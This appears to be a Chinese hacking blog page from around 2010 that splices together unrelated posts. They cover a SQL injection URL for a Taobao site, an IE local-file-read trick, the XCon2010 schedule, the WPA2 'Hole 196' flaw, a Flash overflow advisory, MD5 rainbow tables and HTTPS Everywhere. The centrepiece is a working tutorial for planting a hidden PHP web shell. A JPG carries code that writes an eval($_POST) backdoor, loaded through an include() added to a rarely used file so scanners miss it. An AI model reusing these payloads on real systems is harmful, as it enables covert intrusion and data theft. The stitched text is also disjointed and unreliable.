因

http://mm.taobao.com/?id=mm3′+and+’1′%3D’0

中的id参数过滤不严，导致SQL注入漏洞，但貌似淘宝对数据库的错误机制进行处理，导致网页返回正常页面，但仍可直接通过注入猜解工具直接获取帐号及密码。

漏洞作者： riusksk

1.先下载blat解压缩到c盘blat目录下面。

2.任意目录新建一个bat文件，我这里是mail.bat,内容如下，

  @echo off
date /t >mail.txt
time /t >>mail.txt
netstat -n -p tcp | find "3389" >>mail.txt
:::::::::::::: config::::::::::::::
set from=Neeao.com@126.com
set user=neeao.com
set pass=neeao.com
set to=neeao.com@qq.com
set subj=3389
set mail=mail.txt
set server=smtp.126.com
set debug=-debug -log blat.log -timestamp
::::::::::::::::: run blat :::::::::::::::::
C:\blat\full\blat.exe %mail% -to %to% -base64 -charset Gb2312 -subject %subj%  -server %server% -f %from% -u %user% -pw %pass% %debug%
start Explorer
   很简单的了，先通过bat查找哪个ip连接到了本机的3389端口，然后邮件发送到指定邮箱。

3.进入控制面板—管理工具—终端服务器配置—RDP-Tcp—属性-环境-用户登录时启用下列程序—在程序路径和文件名—写”C:\mail.bat”—起始于—写”C:\”这样就ok了。

4.注销，重新登录，看是否能收到邮件。如果出错的话，桌面出不来的话，可通过ctrl+alt+end来呼出任务管理器来调用桌面。

5.目前发现个小bug，就是登录的时候，会弹出一个cmd的框。

6.如果开通邮箱的短信通知，或者使用139的邮箱，可以达到实时的手机短信通知，有兴趣的可以试试。

影响版本:

• Microsoft Internet Explorer 8.0
• Microsoft Internet Explorer 7.0
• Microsoft Internet Explorer 6.0

漏洞描述:

微软IE在处理本地文件的访问时存在一些问题，结合微软windows的特性可能可以读取本地的某些特殊文件，可能有其他利用。

作为浏览器不可避免的要处理跨域的资源访问的问题，那么一些本身必须允许跨域的标签如 iframe，script，style，而这些标签又允许解析某些格式的文件，如符合javascript语法的文件，符合css语法的文件，一旦本地存在这些文件又包含了敏感的数据，就允许跨域读取了，微软在访问本地文件时抛出错误（可以被用来判断本地文件是否存在），但是利用windows的特性可以绕过该限制，默认允许的c$哦，win7+ie8测试通过

<*参考

http://www.wooyun.org/bug.php?action=view&id=161

*>
测试方法:

遨游早期的security_id是被存储在本地一个固定位置下的文件下的，通过script可以引用该文件，同时结合一些javascript的上下文就可以获取该security_id从而远程进行各种操作。

<script src=”\\127.0.0.1\c$\something.js”></script>

厂商补丁：

Microsoft
———
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

XCon2010会议日程

—————————————————————————————————————

2010-8-4 XCon2010 第一天

—————————————————————————————————————

时间 演讲者 议题

—————————————————————————————————————

07:30 – 09:00 注册

—————————————————————————————————————

09:00 – 09:10 开幕词

—————————————————————————————————————

09:10 – 10:10 Richard Stallman 软件专利的危害

—————————————————————————————————————

10:10 – 10:30 茶歇

—————————————————————————————————————

10:30 – 11:30 FlashSky 基于数据流SDL的安全测试

—————————————————————————————————————

11:30 – 12:30 刘小珍 AVM2虚拟机逃逸技术研究

—————————————————————————————————————

12:30 – 14:30 午餐

—————————————————————————————————————

14:30 – 15:30 陈小波 & 谢君 绕过windows 7 浏览器内存保护

—————————————————————————————————————

15:30 – 16:00 茶歇

—————————————————————————————————————

16:00 – 17:00 玩命 虚拟化病毒感染

—————————————————————————————————————

17:00 – 18:00 nEINEI 对抗AV检测–病毒遗传感染技术探索

—————————————————————————————————————

2010-8-5 XCon2010 第二天

—————————————————————————————————————

时间 演讲者 议题

—————————————————————————————————————

09:00 – 10:00 John Lambert 影响未来开发的9种趋势

—————————————————————————————————————

10:00 – 10:30 茶歇

—————————————————————————————————————

10:30 – 11:30 于淼 硬件虚拟化下的反调试手段软件保护

—————————————————————————————————————

11:30 – 12:30 FunnyWei 深入剖析及挖掘PDF漏洞

—————————————————————————————————————

12:30 – 14:30 午餐

—————————————————————————————————————

14:30 – 15:30 安天实验室 病毒分析流水线

—————————————————————————————————————

15:30 – 16:00 茶歇

—————————————————————————————————————

16:00 – 17:00 XCon2010 论坛

—————————————————————————————————————

17:00 – 17:20 XCon2010 幸运抽奖

—————————————————————————————————————

17:20 – 17:30 闭幕词

Xcon是什么?

该公司表示，漏洞196会导致一个类似于中间人的攻击方式：凭借内部授权用户和开源软件，可以在半空中解密其他用户私密数据、注入恶意流量至 网络、危害其它授权设备。 发现该漏洞的研究人员称，由AES衍生出来的WPA2既没有被破解，也没有通过暴力手段而暴露此漏洞。标准里的条款，允许所有客户端使用一个普通共享密匙 接收来自接入点的广播信号，当授权过的用户使用共享密匙传回利用组共享密匙加密的伪造数据包，漏洞便出现了。

根据IEEE 802.11标准第196页，WPA2使用两种密匙：

1、PTK（成对瞬时密钥），每个客户端唯一的，保护单点流量。
2、GTK（组临时密钥），保护网络内发送至多个客户端的数据。

PTKs可以检测地址欺骗和数据伪造。”GTKs无此属性”。 便是这几个字暴露了漏洞。因为客户端拥有GTK协议以接收广播通信，所以用户可以利用GTK生成其设备自己的广播数据包，进而，客户端会发送自己私人密匙 信息响应这MAC地址。 研究人员使用了网上免费开源软件”MadWiFi”并修改了10行代码，和现成的随便什么无线网卡，伪造了接入点的MAC地址，当作网关向外传送信号。接 收到广播信息的客户端将其视为网关并以PTK回应，而此PTK本应是私密的，此时则能被内部人破译。进而可以控制流量、发起拒绝服务攻击、或者嗅探。

AirTight公司表示，虽然此漏洞的利用仅限于授权用户，但多年的安全研究表明内部安全的缺口正在成为企业亏损的最大源头-机密数据的窃取与贩卖 -无论是哪个极度不爽的员工，或是间谍。尤其是这个网络高度发达的时代。 而对于漏洞196，除了协议升级给这漏洞补一下，不然没辙。

include()函数这个漏洞一直存在,而且一直没有补丁，因为利用的人很少.具体漏洞内容 就是它可以用来把任意文件解析为php.比如include(“linuxso.txt”) include(“linuxso.jpg”); 之类的，全部当作php来执行.因为他是php函数库的问题，所以就跟web服务器和系统无 关了，理论上apache,IIS,nginx或其它web服务器，都是可以的。我只试了apache和nginx，测试 成功.测试方法比较简单，这里就不多说。直接来说这个漏洞有什么用，目前我是用来拿到web shell之后制造超级隐蔽的web后门，其它作用大家自由发挥哈.实验开始.

1，制作一张包含特殊代码的jpg图片. 因为市面上扫描网站木马的程序，都不扫描图片格式的文件,只搜索.php之类的危险后缀.当然.jpg当然是给管理员的感觉是没有 任何隐患滴.新建议一个文件 linuxso.txt 内容如下:

<?fputs(fopen(“linuxso.php”,”w”),”<?eval(\$_POST[linuxso]);?>”)?> //作用是在当前目录，打开一个linuxso.php 写入一句话
重命名为 linuxso.jpg

2， 找个图片目录上传jpg.路径记下来.

找一个深目录内又几乎用不到的php文件,比如class.archive_read.php,添 加一句话 include(“../../xxx/linuxso.jpg”); //搞清楚相对路径哦.

3,访问 http://www.xxx.com/class/class.archive_read.php,即在class.archive_read.php 同目录下生成一句话木马 linuxso.php 密码linuxso

连接一句话.上传大马.玩完了之后，记得删掉小马.这样任意他找什 么扫网马的工具.. 也查不到咱的马.嘎嘎，除非…看过这篇文章的管理员.

如果上传假图片怕被发现的话，还 可以用 copy命令，拿一张正常的图片和linux.txt 合成到一起.完成之后，图片可以正常预览.

命令如下 copy 1.jpg/b+1.txt/b 3.jpg/b 因为这样include函数包含之后，图片会正常显示，所以那句include一定要加到一个几乎用不到的php文件里.

来源：http://laoxiege.blog.sohu.com/153960857.html

下面是翻译介绍：

该表是在自定义的格式，以节省磁盘空间（ 50 ％！ ） 。为了让他们使用，使用rcracki （ rcrack改进），它可以从我们的下载页面下载

如果你想使用原来的rainbowcrack表比rcracki其他程序，那么你可以转换表使用rti2rto也可以在我们的下载页面上找到

当下载以下表格，请考虑捐赠一些钱，以保持网站运行。
其他网站，如rainbowtables.net ，收费单彩虹tableset美国数百$，他们甚至不接近的速度表你可以找到这个免费网站。
这些表格可在这里需要更多的CPU功率的10 倍，并产生高度优化，以提供最快/最压缩的彩虹表可在互联网上你。

百分之99的成功率，看起来不错。

网址：http://www.freerainbowtables.com/en/tables/md5/

Adobe Flash Player 溢出漏洞

漏洞发布时间:2010-06-10

影响版本:
Adobe Flash Player 9.x
Adobe Flash Player 10.x

漏洞描述:
Flash Player是一款非常流行的FLASH播放器。Flash Player在解析Adobe的ActionScript Virtual Machine 2 bytecode中的opcode时存在整数溢出漏洞。这个opcode的运算符用作了到结构的偏移，如果设置为恶意的值就可能执行受控的数据。结构中包含有之后会被调用的函数指针，如果攻击者将受控数据修改为指向无效的偏移，这个函数指针就可能设置为指向恶意的代码，导致以运行浏览器用户的权限执行任意代码。

此外AVM bytecode验证符中也存在整数溢出漏洞。具体来讲，newFrameState方式在计算栈帧的大小时错误的信任了从bytecode所获得的 max_scope和max_stack变量。通过伪造特定的值，就可以溢出表示帧大小的整数，导致以运行浏览器用户的权限执行任意代码。
<*参考
http://secunia.com/advisories/40026/
http://www.adobe.com/support/security/bulletins/apsb10-14.html
http://marc.info/?l=bugtraq&m=127748704309260&w=2
http://marc.info/?l=bugtraq&m=127748736209747&w=2
http://www.us-cert.gov/cas/techalerts/TA10-162A.html
*>

如果你浏览一个国外的网站，如果页面中含有敏感词汇，那么就会出现”链接被重置”的错误，而且这个网站的域名会在大约5分钟内无法访问。这就是我朝某墙的河蟹功能之一。解决这种办法，我们除了使用加密代理（如ssh）或vpn外，还有一种更简单的方法。

我们一般看到的网站网址开头大多都是「HTTP」，而当出现「HTTPS」的网址开头时，代表你正在和这个网站之间进行着「加密连接」，这时候你与网站间的通讯数据将难以被第三方所破解或截取。而「HTTPS Everywhere Beta」这款Firefox插件，正是提供了强制用HTTPS加密方式浏览各大重点网站的功能。

例如本文开头图片，就是在HTTPS加密连线状态下使用Facebook的情形，从Firefox的页面资讯提示中可以看到「你与此网站的连线已加密，可防止他人窃取资讯」，而你也会发现右方广告栏位与右下方聊天室无法显示。

要使用HTTPS加密，必须要网站支持这样的功能，但是很多网站虽然支持，却在预设情况下仍使用正常的HTTP连线方式，一方面是因为可能没有立即的加密需求（例如不是金融电子交易网站）；另外一方面是使用加密连线确实会让浏览速度变得慢一点，因为要处理资讯解码的过程。

而如果你为了隐私安全、通讯保密，或者想要规避第三方对你通讯数据的检查甚至拦截（例如国内的某墙），于是你需要「主动」、「强制」开启HTTPS浏览某些重点网站的话。那么由「EFF」与「TOR」合作开发的这款Firefox扩充套件：「HTTPS Everywhere 」，就可以帮上你的忙。

安装此插件后，在设定里可以看到目前所支支持的几大重点网站，其中我们比较熟悉的有Facebook、Google Search、Google相关服务（例如Google Docs）、Mozilla相关网站、Twitter、Wikipedia、PayPal等等，勾选后按下确定，重新开启 Firefox。这样一来进入上述网站时，就会自动强制使用HTTPS加密连接。

使用这个插件之后，用https浏览的网站就不会被某墙进行关键字过滤了。但如果网站已被屏蔽了IP，那本文的方法无效。